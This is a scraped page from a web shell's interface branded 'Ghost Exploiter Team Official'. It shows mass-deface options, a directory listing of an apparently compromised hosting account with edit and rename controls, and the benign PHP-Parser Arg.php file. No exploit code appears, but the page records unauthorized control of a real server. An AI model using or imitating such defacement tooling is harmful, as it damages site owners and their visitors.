webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
nikic
/
php-parser
/
lib
/
PhpParser
/
Node
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Expr
--
ren
Name
--
ren
Scalar
--
ren
Stmt
--
ren
Arg.php
1.269KB
edt
ren
ArrayItem.php
1.184KB
edt
ren
Attribute.php
0.801KB
edt
ren
AttributeGroup.php
0.632KB
edt
ren
ClosureUse.php
0.95KB
edt
ren
ComplexType.php
0.315KB
edt
ren
Const_.php
0.948KB
edt
ren
DeclareItem.php
0.969KB
edt
ren
Expr.php
0.13KB
edt
ren
FunctionLike.php
0.714KB
edt
ren
Identifier.php
1.773KB
edt
ren
InterpolatedStringPart.php
0.83KB
edt
ren
IntersectionType.php
0.649KB
edt
ren
MatchArm.php
0.662KB
edt
ren
Name.php
8.177KB
edt
ren
NullableType.php
0.663KB
edt
ren
Param.php
2.548KB
edt
ren
PropertyItem.php
1.047KB
edt
ren
Scalar.php
0.096KB
edt
ren
StaticVar.php
0.976KB
edt
ren
Stmt.php
0.13KB
edt
ren
UnionType.php
0.661KB
edt
ren
UseItem.php
1.638KB
edt
ren
VarLikeIdentifier.php
0.49KB
edt
ren
VariadicPlaceholder.php
0.638KB
edt
ren
<?php declare(strict_types=1); namespace PhpParser\Node; use PhpParser\NodeAbstract; class Arg extends NodeAbstract { /** @var Identifier|null Parameter name (for named parameters) */ public ?Identifier $name; /** @var Expr Value to pass */ public Expr $value; /** @var bool Whether to pass by ref */ public bool $byRef; /** @var bool Whether to unpack the argument */ public bool $unpack; /** * Constructs a function call argument node. * * @param Expr $value Value to pass * @param bool $byRef Whether to pass by ref * @param bool $unpack Whether to unpack the argument * @param array<string, mixed> $attributes Additional attributes * @param Identifier|null $name Parameter name (for named parameters) */ public function __construct( Expr $value, bool $byRef = false, bool $unpack = false, array $attributes = [], ?Identifier $name = null ) { $this->attributes = $attributes; $this->name = $name; $this->value = $value; $this->byRef = $byRef; $this->unpack = $unpack; } public function getSubNodeNames(): array { return ['name', 'value', 'byRef', 'unpack']; } public function getType(): string { return 'Arg'; } }